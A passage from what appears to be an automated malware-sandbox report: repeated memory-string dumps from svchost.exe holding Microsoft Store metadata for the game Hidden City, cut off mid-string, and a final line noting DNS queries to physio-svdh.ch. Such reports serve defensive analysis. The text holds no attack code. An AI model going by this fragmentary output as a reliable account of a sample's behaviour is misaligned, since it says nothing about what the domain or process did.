","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
                Source: svchost.exe, 0000000F.00000003.742084704.00000279643D8000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
                Source: svchost.exe, 0000000F.00000003.742084704.00000279643D8000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
                Source: svchost.exe, 0000000F.00000003.742108249.0000027964351000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":426163994,"PackageFormat":"EAppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_neutral_~_ytsefhwckbdv6","PackageId":"79986a28-1780-2990-8357-26989e97befa-X86","PackageRank":30011,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"platf
                Source: svchost.exe, 0000000F.00000003.742108249.0000027964351000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":426163994,"PackageFormat":"EAppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_neutral_~_ytsefhwckbdv6","PackageId":"79986a28-1780-2990-8357-26989e97befa-X86","PackageRank":30011,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"platf
                Source: svchost.exe, 0000000F.00000003.742108249.0000027964351000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":426163994,"PackageFormat":"EAppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_neutral_~_ytsefhwckbdv6","PackageId":"79986a28-1780-2990-8357-26989e97befa-X86","PackageRank":30011,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"platf
                Source: svchost.exe, 0000000F.00000003.742299178.0000027964371000.00000004.00000001.sdmpString found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
                Source: svchost.exe, 0000000F.00000003.742299178.0000027964371000.00000004.00000001.sdmpString found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
                Source: svchost.exe, 0000000F.00000003.742299178.0000027964371000.00000004.00000001.sdmpString found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
                Source: unknownDNS traffic detected: queries for: physio-svdh.ch
